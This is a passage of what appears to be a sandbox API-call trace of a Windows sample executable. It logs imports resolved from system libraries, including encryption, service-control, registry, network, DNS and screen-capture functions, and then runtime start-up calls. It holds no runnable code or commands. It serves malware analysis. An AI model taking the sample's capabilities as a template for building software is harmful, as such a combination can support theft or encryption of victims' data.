lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0044.580] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0044.581] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0044.582] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0044.583] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0044.584] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0044.585] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0044.585] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0044.586] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0044.587] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0044.587] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0044.588] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0044.589] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0044.590] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0044.590] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0044.590] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0044.590] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0047.331] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0047.332] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0047.332] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0047.332] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0047.332] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0047.332] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0047.332] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0047.332] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0047.332] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0047.333] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0047.333] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0047.333] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0047.333] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0047.333] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74510000 [0047.720] GetProcAddress (hModule=0x74510000, lpProcName="GetAdaptersInfo") returned 0x74519263 [0047.720] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0048.166] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0048.167] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0048.167] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0048.167] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x744b0000 [0048.520] GetProcAddress (hModule=0x744b0000, lpProcName="DnsFree") returned 0x744b436b [0048.520] GetProcAddress (hModule=0x744b0000, lpProcName="DnsQuery_W") returned 0x744c572c [0048.520] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0048.520] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0048.521] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0048.521] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0048.521] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0048.521] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0048.521] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0048.521] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0048.522] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0048.522] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0048.522] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0048.522] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0048.522] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0048.522] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743f0000 [0048.808] GetProcAddress (hModule=0x743f0000, lpProcName="atexit") returned 0x7440c544 [0048.809] atexit (param_1=0x1ea0920) returned 0 [0048.816] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f4a4 | out: lpSystemTimeAsFileTime=0x18f4a4*(dwLowDateTime=0x92fb0780, dwHighDateTime=0x1d5d6b4)) [0048.816] GetCurrentThreadId () returned 0x560 [0048.817] GetCurrentProcessId () returned 0xa98 [0048.817] QueryPerformanceCounter (in: lpPerformanceCount=0x18f49c | out: lpPerformanceCount=0x18f49c*=19013062796) returned 1 [0048.863] GetStartupInfoW (in: lpStartupInfo=0x18f434 | out: lpStartupInfo=0x18f434*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0048.874] GetProcessHeap () returned 0x640000 [0048.981] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0048.981] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0048.981] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0048.981] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0048.982] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0048.983] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0048.984] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0048.985] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0048.986] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0048.986] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0048.986] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0048.986] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3bc) returned 0x65f050 [0048.987] GetCurrentThreadId () returned 0x560 [0048.993] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x18) returned 0x6508f8 [0048.993] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x800) returned 0x65f418 [0048.993] GetStartupInfoW (in: lpStartupInfo=0x18f404 | out: lpStartupInfo=0x18f404*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xfe6a8e80, hStdError=0x58)) [0048.993] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0048.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0048.993] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0048.993] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" " [0048.993] GetEnvironmentStringsW () returned 0x65fc20* [0049.023] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xaca) returned 0x6606f8 [0049.030] FreeEnvironmentStringsW (penv=0x65fc20) returned 1 [0049.036] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe")) returned 0x66 [0049.036] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xd6) returned 0x65fc20 [0049.036] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x98) returned 0x65fd00 [0049.036] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3e) returned 0x655368 [0049.036] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x6c) returned 0x65fda0 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x6e) returned 0x65fe18 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x78) returned 0x651ef8 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x62) returned 0x65fe90 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x65aca8 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x48) returned 0x656868 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x28) returned 0x65a6a0 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1a) returned 0x65ebb0 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4a) returned 0x65ff00 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x72) returned 0x651f78 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x65ace0 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x65ad18 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1c) returned 0x65ebd8 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xd2) returned 0x65ff58 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x7c) returned 0x660038 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x36) returned 0x6600c0 [0049.037] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3a) returned 0x6553b0 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x90) returned 0x660100 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x65a6d0 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x65ad50 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x36) returned 0x660198 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x48) returned 0x6568b8 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x52) returned 0x6601d8 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3c) returned 0x6553f8 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x82) returned 0x660238 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2e) returned 0x65ad88 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1e) returned 0x65ec00 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2c) returned 0x65adc0 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x54) returned 0x6602c8 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x52) returned 0x660328 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2a) returned 0x65adf8 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3c) returned 0x655440 [0049.038] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x54) returned 0x660388 [0049.039] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x65a700 [0049.039] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x30) returned 0x65ae30 [0049.039] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x8c) returned 0x6603e8 [0049.039] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x6606f8 | out: hHeap=0x640000) returned 1 [0049.084] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x800) returned 0x660480 [0049.090] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x80) returned 0x660c88 [0049.141] GetLastError () returned 0x0 [0049.141] SetLastError (dwErrCode=0x0) [0049.141] GetLastError () returned 0x0 [0049.141] SetLastError (dwErrCode=0x0) [0049.141] GetLastError () returned 0x0 [0049.141] SetLastError (dwErrCode=0x0) [0049.141] GetACP () returned 0x4e4 [0049.141] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x220) returned 0x660d10 [0049.142] GetLastError () returned 0x0 [0049.142] SetLastError (dwErrCode=0x0) [0049.142] IsValidCodePage (CodePage=0x4e4) returned 1 [0049.142] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3f8 | out: lpCPInfo=0x18f3f8) returned 1 [0049.148] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eec0 | out: lpCPInfo=0x18eec0) returned 1 [0049.154] GetLastError () returned 0x0 [0049.154] SetLastError (dwErrCode=0x0) [0049.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0049.160] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18eed4 | out: lpCharType=0x18eed4) returned 1 [0049.160] GetLastError () returned 0x0 [0049.160] SetLastError (dwErrCode=0x0) [0049.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec08, cchWideChar=256 | out: lpWideCharStr=" 